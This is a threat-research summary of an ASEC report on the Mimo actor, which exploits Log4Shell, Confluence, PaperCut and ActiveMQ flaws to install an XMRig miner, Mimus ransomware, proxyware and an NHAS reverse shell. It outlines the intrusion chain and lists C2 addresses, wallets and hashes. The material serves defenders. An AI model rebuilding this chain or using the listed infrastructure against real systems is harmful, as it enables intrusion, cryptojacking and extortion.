Threat Research

Mimo CoinMiner and Mimus Ransomware Installed via Vulnerability Attacks – ASEC BLOG

Securonix

The article documents how the Mimo threat actor exploits a range of public-facing vulnerabilities to install malware, including CoinMiners, Mimus ransomware, proxyware, and reverse shell tools. It also details the intrusion chain, from initial exploitation to encryption and monetization, plus observed IOCs and recommended defenses. #Mimo #Mimus #MauriCrypt #XMRig #Log4Shell #Confluence #ActiveMQ #PaperCut #NHAS #Tor

Keypoints

  • Multiple vulnerabilities have been used by Mimo (Hezb) since 2022 to install CoinMiners and other malware (Log4Shell CVE-2021-44228; WSO2 RCE CVE-2022-29464; Confluence CVE-2022-26134; PaperCut CVE-2023-27350; ActiveMQ CVE-2023-46604).
  • Early activity included exploiting Atlassian Confluence servers to drop the XMRig miner; VMware Horizon targets with unpatched Log4Shell remain at risk.
  • PowerShell is used in vulnerability-driven attacks to fetch and execute batch scripts (lnl.bat, kill.bat), which then download and run the miner via dom.zip/dom-6.zip.
  • The miner chain often uses NSSM to install XMRig as a Windows service, enabling persistence and ongoing mining.
  • Mimo attackers also deployed Mimus ransomware (Maur iCrypt) based on open-source code, encrypting many file types with AES-256 and appending .encrypted extensions.
  • Proxyware and reverse shell tools were observed at the same addresses used for the miner, suggesting proxyjacking and additional monetization paths.
  • NHAS reverse shell (reverse_ssh) provides basic command execution and port forwarding, enabling continued control over compromised hosts.
  • Defensive recommendations emphasize patching, restricting external-access services, and updating to latest versions (e.g., V3) to block known exploits.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The actor exploited public vulnerabilities (e.g., Log4Shell CVE-2021-44228) to install CoinMiner. [The first known activity … the exploitation of the Log4Shell vulnerability (CVE-2021-44228) …]
  • [T1059.001] PowerShell – PowerShell is used to execute vulnerability-driven actions and download Batch malware. [The Powershell executed through the vulnerability attacks is executed by downloading the Batch malware. …]
  • [T1105] Ingress Tool Transfer – Batch malware downloads and executes additional tools (dom.zip/dom-6.zip) to deploy the miner. [The Batch malware downloads the β€œdom.zip” or β€œdom-6.zip” compressed file …]
  • [T1560.001] Archive Collected Data – Decompression of downloaded archives using 7z to extract XMRig and NSSM components. [decompresses it using the 7z tool]
  • [T1543.003] Create or Modify System Process: Windows Service – NSSM is used to install XMRig as a service. [The Batch script uses the NSSM afterwards to register XMRig as a service.]
  • [T1486] Data Encrypted for Impact – Mimus ransomware encrypts files (AES-256) with a .encrypted extension. [Encryption algorithm AES-256 CTR … Encryption extension .encrypted]
  • [T1090] Proxy – Proxyware and Tor-based communications are used to obscure traffic and monetize via proxying. [Proxyware is a program that shares a part of the Internet bandwidth …]
  • [T1090.001] Proxy – Tor-based C2 communications are used to connect to the C2 server. [downloaded Tor Browser to connect to the C&C server via the browser]
  • [T1021.004] Remote Services – Reverse SSH (NHAS) uses SSH for C2 communications and remote control. [The reverse shell … uses the SSH protocol to communicate with the C&C server]
  • [T1071.001] Web Protocols – C2 URLs and domains are used for command and control (e.g., hxxp://windows.n1tro[.]cyou:4544). [C&C URL – hxxp://windows.n1tro[.]cyou:4544]
  • [T1132] Data Encoding – Filenames and indicators are Base64-encoded in the ransomware configuration. [files with the specified extensions … are encoded in Base64 and their extensions changed to β€œ.encrypted”]

Indicators of Compromise

  • [IOC Type] Domains and URLs – C2: windows.n1tro.cyou:4544; download and exploit URLs such as dom.zip, dom-6.zip, poc-win.xml, lnl.bat, kill.bat, etc.
  • [IOC Type] IP Addresses – 102.130.112.157:3232 (NHAS reverse shell C2), 50.19.48.59:82 (additional download C2).
  • [IOC Type] Bitcoins Wallets – 15Jz1fmreZx9wG93DKjTXMhuLpPpCgvEQk, 46HmQz11t8uN84P8xgThrQXSYm434VC7hhNR8be4QrGtM1Wa4cDH2GkJ2NNXZ6Dr4bYg6phNjHKYJ1QfpZRBFYW5V6qnRJN
  • [IOC Type] Wallet Addresses Context – Used by threat actor for ransom payments and decryption tool purchases (e.g., decryption tool site).
  • [IOC Type] Email Address – [email protected]
  • [IOC Type] Files/Hashes – 618680a68eb6ac79f530a0291ad29d9f; 5e0f18dfe16f274d34716d011e0a3f39; (and 6 more hashes)
  • [IOC Type] Decryption Tool Site – https://satoshidisk[.]com/pay/CIIRg6

Read more: https://asec.ahnlab.com/en/60440/

SHARE THIS STORY

WhatsAppX (Twitter)TelegramBlueskyFacebookLinkedInThreadsEmailPrint